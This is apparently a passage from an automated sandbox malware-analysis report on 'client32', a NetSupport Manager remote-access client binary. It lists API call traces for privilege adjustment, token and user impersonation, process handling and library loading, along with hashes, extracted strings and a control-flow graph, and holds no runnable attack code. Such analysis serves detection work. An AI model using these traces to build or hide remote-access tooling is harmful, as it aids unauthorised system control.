                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                    • String ID: Client32$NSMWClass$NSMWClass
                                                                                                                                                    • API String ID: 3192549508-611217420
                                                                                                                                                    • Opcode ID: 0b0c06552eb5d8578d5f8a1ba1b3e93930f4d748b8e68e94dbd9e084aab78c4a
                                                                                                                                                    • Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
                                                                                                                                                    • Opcode Fuzzy Hash: 0b0c06552eb5d8578d5f8a1ba1b3e93930f4d748b8e68e94dbd9e084aab78c4a
                                                                                                                                                    • Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99
                                                                                                                                                    Function 1109ED30 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00E73DD0,00E73DD0,00E73DD0,00E73DD0,00E73DD0,00E73DD0,00E73DD0,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                                                                                    • EqualSid.ADVAPI32(?,00E73DD0,?,00000001,00000001), ref: 1109EDC3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InformationToken$AllocateEqualInitialize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1878589025-0
                                                                                                                                                    • Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                                                                                    • Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
                                                                                                                                                    • Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                                                                                                    • Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791
                                                                                                                                                    Function 1109D860 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,1EF76653,00080000,00000000,?), ref: 1109D88D
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2349140579-0
                                                                                                                                                    • Opcode ID: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                                                                                                    • Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
                                                                                                                                                    • Opcode Fuzzy Hash: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                                                                                                    • Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0
                                                                                                                                                    Function 1109D8F0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,1109EC30,00000244,cant create events), ref: 1109D915
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                                    • Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                                                                                    • Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
                                                                                                                                                    • Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                                                                                                    • Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60
                                                                                                                                                    Function 1102EBD0 Relevance: 252.2, APIs: 32, Strings: 111, Instructions: 1967windowthreadsleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • GetSystemMetrics.USER32(00002000), ref: 1102ED54
                                                                                                                                                    • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EF15
                                                                                                                                                      • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                                                                                      • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                                                                                      • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                                                                                      • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                                                                                      • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
                                                                                                                                                    • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
                                                                                                                                                    • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F
                                                                                                                                                      • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
                                                                                                                                                      • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
                                                                                                                                                      • Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F59
                                                                                                                                                    • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1102EFF0
                                                                                                                                                    • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EFFD
                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    • IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
                                                                                                                                                    • LoadIconA.USER32(11000000,000004C1), ref: 1102F521
                                                                                                                                                    • LoadIconA.USER32(11000000,000004C2), ref: 1102F531
                                                                                                                                                    • DestroyCursor.USER32(00000000), ref: 1102F557
                                                                                                                                                    • DestroyCursor.USER32(00000000), ref: 1102F568
                                                                                                                                                      • Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
                                                                                                                                                      • Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
                                                                                                                                                      • Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
                                                                                                                                                      • Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3
                                                                                                                                                    • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
                                                                                                                                                    • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
                                                                                                                                                    • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 11030136
                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000278D0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 110303D4
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
                                                                                                                                                    • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
                                                                                                                                                    • SetWindowPos.USER32(000A0036,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 11030449
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,1105A720,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 110304CA
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • wsprintfA.USER32 ref: 11030645
                                                                                                                                                      • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,1EF76653,?,?,00000000), ref: 1112909A
                                                                                                                                                      • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
                                                                                                                                                      • Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
                                                                                                                                                    • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$358075$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                                                                                    • API String ID: 372548862-4025968211
                                                                                                                                                    • Opcode ID: b88d419bf3da3850df4f228622318878eddd1f0cdce54a214fe2f9a47240bf6f
                                                                                                                                                    • Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
                                                                                                                                                    • Opcode Fuzzy Hash: b88d419bf3da3850df4f228622318878eddd1f0cdce54a214fe2f9a47240bf6f
                                                                                                                                                    • Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56
                                                                                                                                                    Function 1102E0D0 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1181 1102e0d0-1102e120 call 111101b0 1184 1102e122-1102e136 call 11143630 1181->1184 1185 1102e138 1181->1185 1187 1102e13e-1102e183 call 11142e60 call 11143690 1184->1187 1185->1187 1193 1102e323-1102e332 call 11145990 1187->1193 1194 1102e189 1187->1194 1200 1102e338-1102e348 1193->1200 1196 1102e190-1102e193 1194->1196 1198 1102e195-1102e197 1196->1198 1199 1102e1b8-1102e1c1 1196->1199 1201 1102e1a0-1102e1b1 1198->1201 1202 1102e1c7-1102e1ce 1199->1202 1203 1102e2f4-1102e30d call 11143690 1199->1203 1204 1102e34a 1200->1204 1205 1102e34f-1102e363 call 1102d360 1200->1205 1201->1201 1206 1102e1b3 1201->1206 1202->1203 1207 1102e2c3-1102e2d8 call 11163ca7 1202->1207 1208 1102e1d5-1102e1d7 1202->1208 1209 1102e2da-1102e2ef call 11163ca7 1202->1209 1210 1102e26a-1102e29d call 11162777 call 11142e60 1202->1210 1211 1102e2ab-1102e2c1 call 11164ed0 1202->1211 1212 1102e25b-1102e265 1202->1212 1213 1102e29f-1102e2a9 1202->1213 1214 1102e21c-1102e222 1202->1214 1215 1102e24c-1102e256 1202->1215 1203->1196 1227 1102e313-1102e315 1203->1227 1204->1205 1230 1102e368-1102e36d 1205->1230 1206->1203 1207->1203 1208->1203 1221 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 1208->1221 1209->1203 1210->1203 1211->1203 1212->1203 1213->1203 1222 1102e224-1102e238 call 11163ca7 1214->1222 1223 1102e23d-1102e247 1214->1223 1215->1203 1221->1203 1222->1203 1223->1203 1235 1102e413-1102e42d call 11146fe0 1227->1235 1236 1102e31b-1102e321 1227->1236 1230->1235 1237 1102e373-1102e398 call 110b7df0 call 11147060 1230->1237 1248 1102e483-1102e48f call 1102bc40 1235->1248 1249 1102e42f-1102e448 call 1105e820 1235->1249 1236->1193 1236->1200 1258 1102e3a3-1102e3a9 1237->1258 1259 1102e39a-1102e3a1 1237->1259 1261 1102e491-1102e498 1248->1261 1262 1102e468-1102e46f 1248->1262 1249->1248 1260 1102e44a-1102e45c 1249->1260 1263 1102e3ab-1102e3b2 call 11028360 1258->1263 1264 1102e409 1258->1264 1259->1235 1260->1248 1278 1102e45e 1260->1278 1266 1102e475-1102e478 1261->1266 1268 1102e49a-1102e4a4 1261->1268 1262->1266 1267 1102e67a-1102e69b GetComputerNameA 1262->1267 1263->1264 1275 1102e3b4-1102e3e6 1263->1275 1264->1235 1273 1102e47a-1102e481 call 110b7df0 1266->1273 1274 1102e4a9 1266->1274 1269 1102e6d3-1102e6d9 1267->1269 1270 1102e69d-1102e6d1 call 11028230 1267->1270 1268->1267 1276 1102e6db-1102e6e0 1269->1276 1277 1102e70f-1102e722 call 11164ed0 1269->1277 1270->1269 1301 1102e727-1102e733 1270->1301 1280 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 1273->1280 1274->1280 1294 1102e3f0-1102e3ff call 110f64d0 1275->1294 1295 1102e3e8-1102e3ee 1275->1295 1283 1102e6e6-1102e6ea 1276->1283 1299 1102e917-1102e93a 1277->1299 1278->1262 1329 1102e64a-1102e652 SetLastError 1280->1329 1330 1102e58c-1102e5a3 1280->1330 1289 1102e706-1102e708 1283->1289 1290 1102e6ec-1102e6ee 1283->1290 1298 1102e70b-1102e70d 1289->1298 1296 1102e702-1102e704 1290->1296 1297 1102e6f0-1102e6f6 1290->1297 1302 1102e402-1102e404 call 1102d900 1294->1302 1295->1294 1295->1302 1296->1298 1297->1289 1304 1102e6f8-1102e700 1297->1304 1298->1277 1298->1301 1312 1102e962-1102e96a 1299->1312 1313 1102e93c-1102e942 1299->1313 1308 1102e735-1102e74a call 110b7df0 call 1102a1f0 1301->1308 1309 1102e74c-1102e75f call 11081d30 1301->1309 1302->1264 1304->1283 1304->1296 1336 1102e7a3-1102e7bc call 11081d30 1308->1336 1324 1102e761-1102e784 1309->1324 1325 1102e786-1102e788 1309->1325 1320 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 1312->1320 1321 1102e96c-1102e979 call 11036710 call 11162777 1312->1321 1313->1312 1318 1102e944-1102e95d call 1102d900 1313->1318 1318->1312 1321->1320 1324->1336 1334 1102e790-1102e7a1 1325->1334 1338 1102e613-1102e61f 1329->1338 1330->1338 1351 1102e5a5-1102e5ae 1330->1351 1334->1334 1334->1336 1353 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 1336->1353 1354 1102e8fc-1102e909 call 11164ed0 1336->1354 1343 1102e662-1102e671 1338->1343 1344 1102e621-1102e62d 1338->1344 1343->1267 1352 1102e673-1102e674 FreeLibrary 1343->1352 1349 1102e63f-1102e643 1344->1349 1350 1102e62f-1102e63d GetProcAddress 1344->1350 1357 1102e654-1102e656 SetLastError 1349->1357 1358 1102e645-1102e648 1349->1358 1350->1349 1351->1338 1356 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 1351->1356 1352->1267 1393 1102e853-1102e869 call 11129e00 1353->1393 1394 1102e83f-1102e84e call 11029a70 1353->1394 1370 1102e90c-1102e911 CharUpperA 1354->1370 1356->1338 1376 1102e5e8-1102e60e call 11147060 call 11027f80 1356->1376 1362 1102e65c 1357->1362 1358->1362 1362->1343 1370->1299 1376->1338 1398 1102e882-1102e8bc call 110d0e20 * 2 1393->1398 1399 1102e86b-1102e87d call 110d0e20 1393->1399 1394->1393 1406 1102e8d2-1102e8fa call 11164ed0 call 110d0a10 1398->1406 1407 1102e8be-1102e8cd call 11029a70 1398->1407 1399->1398 1406->1370 1407->1406
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
